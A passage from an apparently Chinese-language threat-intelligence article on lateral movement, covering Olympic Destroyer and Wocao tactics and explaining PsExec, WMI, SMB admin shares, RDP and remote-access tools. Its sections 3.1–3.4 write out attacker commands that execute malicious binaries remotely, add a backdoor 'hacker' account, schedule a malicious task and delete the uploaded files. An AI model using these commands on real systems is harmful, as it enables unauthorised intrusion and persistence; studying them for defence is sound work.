Olympic Destroyer 通过 ARP 表和 WMI 进行网络发现，使用 PsExec 和 WMI 实现远程执行和横向传播，窃取凭据并动态更新恶意软件，随后执行破坏性操作删除备份和日志文件、禁用系统服务、擦除文件共享内容，最终关闭受感染的系统以阻止恢复。

2.14.1 网络发现与初始传播

在感染初始阶段，Olympic Destroyer 通过 ARP 表 和 WMI 查询 进行网络发现。它使用 Windows API GetIPNetTable 来检查 ARP 表，并使用 WMI 查询 (SELECT ds_cn FROM ds_computer) 枚举当前环境中的所有系统。这些操作旨在识别目标网络中的其他计算机，作为下一步传播的目标。

2.14.2 PsExec 和 WMI 横向传播

一旦识别到网络中的目标，Olympic Destroyer 通过使用 PsExec 和 WMI 来远程执行代码，推动其横向移动。它会将恶意二进制文件复制到目标计算机上的 %ProgramData%\%COMPUTERNAME%.exe，然后通过 VBScript 执行该文件。PsExec 是 Windows 系统管理员常用的合法工具，攻击者利用它来远程执行命令，避免引起怀疑。WMI 则通过 Win32_Process 类远程创建和执行进程。

2.14.3 凭据窃取与动态更新

为了在目标网络中进一步传播，Olympic Destroyer 使用了两种凭据窃取工具：一个用于窃取浏览器中的存储凭据（支持 Internet Explorer、Firefox 和 Chrome），另一个则是通过类似于 Mimikatz 的技术从 LSASS 进程中窃取系统凭据。被窃取的凭据会动态更新恶意软件，并生成新的二进制文件，这些文件包含从已感染系统中获取的新凭据。这些新凭据使得恶意软件能够继续在新目标系统上传播。

2.14.4 破坏性操作与服务禁用

在横向移动过程中，Olympic Destroyer 还执行了一系列破坏性操作，试图阻止被攻击系统的恢复。它删除了系统上的所有影子副本（通过 vssadmin），删除了备份目录（通过 wbadmin），并禁用了 Windows 恢复控制台（通过 bcdedit）。此外，恶意软件还删除了系统和安全日志文件，以掩盖其操作痕迹。最后，攻击者通过 ChangeServiceConfigW API 禁用了所有系统服务，进一步破坏系统的可用性。

2.14.5 文件共享擦除与系统关闭

Olympic Destroyer 还会列出映射的文件共享，并擦除其中的可写文件，使用未初始化的数据或 0x00 来覆盖文件内容，视文件大小而定。完成这些操作后，恶意软件会关闭受感染的系统，确保系统无法继续使用。

2.15 APT组织 Wocao

攻击者通过 web shell 获取初始访问权限后，利用凭据转储工具（如 Mimikatz）提升权限，使用 PsExec 和 WMI 等工具在网络中横移向动，扫描内网识别目标系统，执行恶意代码，窃取敏感数据并通过后门外传，同时删除痕迹以避免检测。

2.15.1 初始访问和侦察

攻击者首先通过其他威胁行为者放置的 web shell 攻击漏洞服务器，获得初始访问权限。在获得访问权限后，攻击者上传了自己的 web shell 以保持持久访问，从而进行网络内部的侦察工作，包括检查具有管理员权限的帐户、已安装的软件以及网络配置。

2.15.2 凭据转储与权限提升

攻击者进入网络后，通常使用工具（如 Mimikatz）从内存中转储凭据，或者访问受感染系统上的密码管理器。他们特别针对具有更高权限的系统和个人（例如域管理员），以便更轻松地在网络中横向移动。

2.15.3 使用有效凭据

在获取了域或本地管理员凭据后，攻击者利用这些有效凭据访问网络中的其他系统。在某些情况下，他们还盗取了 VPN 凭据，通过窃取软令牌绕过双因素认证 (2FA)，使他们能够持续以合法用户的身份访问网络。

2.15.4 横向移动工具

攻击者使用了各种自定义工具来实现横向移动，包括 PsExec 和 WMI，这些工具被用于在远程系统上执行命令，使攻击者能够在网络中的系统之间移动。此外，攻击者还部署了自定义后门工具 XServer，该工具允许远程命令执行和代理功能，使他们能够控制受感染的系统，并通过 TLS 加密流量在网络中安全地横向移动。

2.15.5 系统扫描和目标识别

攻击者使用类似 nbtscan 的工具和自定义扫描器对内网进行扫描，识别具有开放端口、服务或用户会话的主机，特别关注包含关键数据或具有高权限的系统以便进一步攻击。此外，他们还通过侦察脚本收集系统信息，如已安装的补丁、运行的服务和网络连接，从而帮助确定有价值的目标进行进一步利用。

2.15.6 远程执行

攻击者经常通过计划任务在远程系统上执行恶意代码或建立持久访问，有时还会创建服务来执行恶意软件或后门命令。一旦攻击者入侵了关键系统，他们使用自定义工具收集敏感数据，例如递归列出目录和捕获键盘输入。收集到的数据通常使用 WinRAR 压缩，然后通过后门功能外传。达到目的后，攻击者删除了受感染系统上的日志和痕迹。他们用合法的 Windows DLL 覆盖文件，然后删除它们，以干扰取证调查并避免检测。

3. 横向传输工具介绍

3.1 命令行工具与远程执行工具

PsExec 和 WMI：常用于远程执行命令、部署恶意软件，通常在 Windows 网络中被滥用。攻击者利用这些工具在网络中横向传播并执行命令。

3.1.1 PsExec 实现远程命令执行

PsExec 概述：PsExec 是 Microsoft Sysinternals 套件中的工具，允许管理员（或攻击者）在远程系统上执行命令或程序，无需在目标系统上手动安装客户端。它广泛应用于远程系统管理，也常被攻击者用于横向移动和恶意软件执行。具体来说，PsExec 通过使用 SMB 共享连接到远程计算机，并在远程计算机上创建一个临时服务，通过该服务执行命令。为了实现远程命令执行，攻击者需要具备目标机器的管理员凭据，才能在目标系统上成功执行 PsExec 的操作。

PsExec 原理：PsExec 通过使用 SMB 协议连接到远程计算机，并通过 IPC$ 共享目录与目标系统通信。在远程系统上，PsExec 临时创建一个服务，用于执行传递的命令或可执行文件。一旦服务启动，PsExec 通过该服务执行命令并返回输出结果（如果使用了 `-d` 选项，则命令在后台执行）。命令执行完毕后，PsExec 会删除临时创建的服务以清理环境。其具体指令包括：

# 在远程主机上执行简单命令
psexec.exe \\192.168.1.10 -u AdminUser -p Password ipconfig

# 在远程主机上执行本地程序
psexec.exe \\192.168.1.10 -u AdminUser -p Password -c C:\path\to\malicious.exe

# 执行带参数的程序
psexec.exe \\192.168.1.10 -u AdminUser -p Password cmd /c "net user hacker password123 /add"

# 隐藏输出和执行
psexec.exe \\192.168.1.10 -u AdminUser -p Password -d C:\path\to\malicious.exe

3.1.2 WMI 实现远程命令执行

WMI 概述：WMI (Windows Management Instrumentation) 是 Windows 的管理接口，允许管理员通过脚本或命令行管理本地和远程计算机的系统配置、进程和服务。WMI 提供了一个强大的接口，攻击者可以利用它在远程机器上执行命令、操作文件或管理系统设置。

WMI 原理：通过 `wmic` 或 PowerShell，WMI 与远程主机的 Winmgmt 服务通信，该服务默认在 Windows 上运行，支持远程管理。使用 WMI 的 Win32_Process 类，用户可以在远程主机上启动进程，WMI 会调用目标系统的 API 来创建并执行命令。命令执行后，WMI 返回创建进程的输出结果，供管理员或攻击者查看。其具体指令包括：

# 通过 wmic 远程执行命令
wmic /node:192.168.1.10 /user:AdminUser /password:Password process call create "ipconfig"

# 通过 PowerShell 执行 WMI 命令
Invoke-WmiMethod -Path Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami" -ComputerName 192.168.1.10 -Credential (Get-Credential)

# 远程执行带参数的程序
wmic /node:192.168.1.10 /user:AdminUser /password:Password process call create "powershell.exe -ExecutionPolicy Bypass -File C:\path\to\script.ps1"

3.1.3 PsExec 与 WMI 对比总结

PsExec 是一个更直接的远程执行工具，专为命令行使用而设计，能够传输和执行本地程序，依赖 SMB 连接到远程系统，通过创建临时服务来执行命令，适用于频繁远程管理或大规模部署恶意软件的场景。WMI 则是 Windows 系统内置的管理接口，功能广泛，不仅限于远程执行命令，还支持系统管理和进程控制，依赖 WMI 服务通信，可通过 PowerShell 或 wmic 实现远程命令执行。WMI 常用于更复杂的远程系统管理任务，也被攻击者滥用用于横向移动和信息收集。两者在横向移动和远程执行中都非常有效，但各有不同的适用场景。

2015年乌克兰电网袭击：使用 PsExec 进行远程执行，实现横向移动。

CONTI 勒索软件：使用 WMI 进行远程执行，实现横向移动。

Wocao：使用 PsExec 和 WMI 进行远程执行，实现横向移动。

3.2 文件共享协议

SMB (Server Message Block) 和 Windows Admin Shares：通过文件共享协议，攻击者可以利用内网中的共享目录传输恶意软件，并通过远程命令执行这些文件。

3.2.1 SMB 和 Windows Admin Shares 的概述

SMB 是网络中的文件共享协议，允许用户远程访问文件、打印机等资源。它主要用于 Windows 内网中系统之间的文件传输。Windows Admin Shares 是 Windows 系统中的默认管理共享目录，如 C$（代表C盘根目录）、ADMIN$（代表 Windows 目录），这些共享目录只对管理员开放。

3.2.3 SMB 和 Windows Admin Shares 的原理

攻击者首先使用 net use 命令建立与目标计算机的 SMB 连接，通过 SMB 协议访问共享目录，如 C$ 和 ADMIN$，这些目录通常只有管理员权限的用户才能访问。随后，攻击者将恶意文件（如可执行文件、脚本或恶意 DLL）上传到目标计算机。上传后，攻击者可以通过 PsExec 或 WMI 来远程执行这些文件。PsExec 通过创建临时服务来执行上传的恶意文件，而 WMI 允许在远程系统上创建进程并运行文件。执行完成后，攻击者通常会删除上传的文件，以避免被管理员或安全人员发现。

3.2.3 SMB 和 Windows Admin Shares 的指令

攻击者需要获取目标计算机的管理员凭据才能访问 SMB 共享目录并上传文件，同时目标计算机必须启用 SMB 协议并允许文件共享。其具体指令包括：

# SMB 连接和文件上传命令
net use \\192.168.1.10\C$ /USER:AdminUser Password
copy malicious.exe \\192.168.1.10\C$\path\to\upload

# 通过 PsExec 执行恶意文件
psexec.exe \\192.168.1.10 -u AdminUser -p Password -d C:\path\to\upload\malicious.exe

# 通过 WMI 执行恶意文件
wmic /node:192.168.1.10 /user:AdminUser /password:Password process call create "C:\path\to\upload\malicious.exe"

# 清理痕迹
del \\192.168.1.10\C$\path\to\upload\malicious.exe

Lucifer 僵尸网络：使用 SMB 进行文件共享，实现横向移动。

APT 组织 APT32：使用 Windows Admin Shares 进行文件共享，实现横向移动。

3.3 远程桌面协议

RDP (Remote Desktop Protocol)：RDP 允许攻击者通过窃取凭据或暴力破解访问远程系统，并在内部网络中横向移动。它是 Windows 环境中较为常见的横向移动方式。

3.3.1 远程桌面协议的概述

RDP 本质上是一个远程访问协议，它允许用户远程连接目标计算机的桌面，并直接执行命令或启动应用程序。因此，RDP 本身不需要额外的命令行工具来执行命令。通过获得目标系统的 RDP 访问权限，攻击者可以直接在远程系统上操作，就像在本地一样。

3.3.2 远程桌面协议的原理

攻击者通常通过暴力破解 RDP 凭据或窃取管理员凭据获得远程桌面访问权限。一旦成功访问，攻击者可以通过 RDP 登录远程计算机，使用 `cmd.exe` 或 `powershell.exe` 直接执行命令进行系统管理或运行恶意软件。此外，攻击者还可以利用 Windows 的计划任务功能，安排任意程序或命令在指定时间执行，或者通过 RDP 的文件共享功能将恶意文件上传到目标系统后再执行这些文件，从而实现进一步的攻击。

3.3.3 远程桌面协议的指令

攻击者通过暴力破解 RDP 登录凭据或窃取合法凭据获取远程访问权限后，可以通过 RDP 连接到目标计算机。

# 使用 RDP 连接到目标系统
mstsc /v:192.168.1.10

# 使用 CMD 执行命令
net user hacker password123 /add

# 使用 PowerShell 执行命令
powershell.exe -ExecutionPolicy Bypass -File C:\path\to\malicious.ps1

# 使用计划任务执行命令
schtasks /create /sc once /tn "MaliciousTask" /tr "C:\path\to\malicious.exe" /st 23:30

Magic Hound：使用 RDP 访问远程系统，实现横向移动。

Netwalker：使用 RDP 访问远程系统，实现横向移动。

3.4 远程访问工具

远程访问工具 (如 AnyDesk)：攻击者利用这些工具跨设备传输恶意软件，特别是在网络边界严格受限的环境下，可以通过这些方式绕过传统防火墙和安全措施。

3.4.1 远程访问工具的概述

远程访问工具（如 AnyDesk、TeamViewer、LogMeIn 等）允许用户通过互联网远程连接并控制另一台计算机。这类工具常用于远程支持和远程办公，因为它们提供了跨设备的无缝连接。攻击者也可以利用这些工具绕过防火墙和传统的安全措施，通过远程访问目标计算机执行恶意命令或传播恶意软件。

3.4.2 远程访问工具的原理

远程访问工具通过互联网连接到目标系统，通常绕过网络防火墙和 NAT 设备，因为连接通过外部服务器中介进行。用户只需输入目标的 ID 或凭据即可建立连接。一旦连接建立，攻击者可以完全控制目标系统，使用命令行、PowerShell 等工具执行命令，或传输文件来安装和运行恶意软件。由于这种连接是通过外部服务器进行的，传统的防火墙规则难以阻止外部访问，特别是在默认允许互联网连接的情况下，攻击者可以轻松渗透网络。

3.4.3 远程访问工具的指令

# 使用 CMD 执行命令
net user hacker password123 /add

# 使用 PowerShell 执行命令
powershell.exe -ExecutionPolicy Bypass -File C:\path\to\malicious.ps1

# 使用计划任务执行命令
schtasks /create /sc once /tn "MaliciousTask" /tr "C:\path\to\malicious.exe" /st 23:30

AvosLock 勒索软件：使用 AnyDesk 和 PDQ Deploy 跨设备传输恶意软件。

4. 横向传输工具总结

4.1 协议与工具之间的关系

文件共享协议（SMB 和 Admin Shares） 是文件传输的基础，通常与 PsExec 或 WMI 结合使用以实现远程执行。SMB 协议不仅允许攻击者传输文件，还为 PsExec 提供了必要的传输通道，PsExec 依赖 SMB 来创建远程服务并执行命令。

PsExec 和 WMI 是常用的远程命令执行工具，它们分别通过 SMB 和 WMI 服务进行通信，从而执行恶意文件。PsExec 更专注于命令行操作和文件执行，而 WMI 则提供了更复杂的系统管理功能，能够通过 PowerShell 实现远程控制。

RDP 和 远程访问工具（如 AnyDesk）提供了更全面的远程桌面访问功能，允许攻击者直接控制系统、执行命令或上传文件。RDP 和远程访问工具支持文件传输功能，通常结合文件共享协议来传输和执行恶意软件。

4.2 协议与工具的优缺点

PsExec 是一种轻量且功能强大的工具，适用于批量远程命令执行，但依赖 SMB，容易被监控发现。WMI 功能丰富，支持复杂的系统管理任务，适合隐蔽的远程管理和信息收集，但依赖 WMI 服务。SMB 和 Admin Shares 为文件传输提供基础，配合 PsExec 或 WMI 可实现远程命令执行，但需要管理员权限且容易被监控。RDP 提供全面的远程桌面访问，适用于跨网络的攻击，但依赖凭据且容易被发现。远程访问工具能绕过网络限制，适合在受限环境下使用，但需互联网连接并依赖远程访问凭据。

工具/协议	优点	缺点	应用场景
PsExec	轻量、命令行友好、广泛使用	依赖 SMB、易被检测	适用于批量远程命令执行、大规模部署恶意软件
WMI	功能丰富、支持系统管理、静默执行	复杂性高、依赖 WMI 服务	适用于复杂的系统管理、信息收集、远程执行
SMB & Admin Shares	文件传输基础、广泛支持	需要管理员权限、高风险端口	用于内网文件传输，配合 PsExec 或 WMI 实现命令执行
RDP	全面控制、支持文件传输、跨平台	依赖凭据、易被监控	适用于跨网络的攻击，远程桌面控制与文件传输
RAT	绕过网络限制、提供完整控制、合法性强”	依赖互联网连接、需凭据	适用于绕过网络限制的环境，通过互联网远程控制系统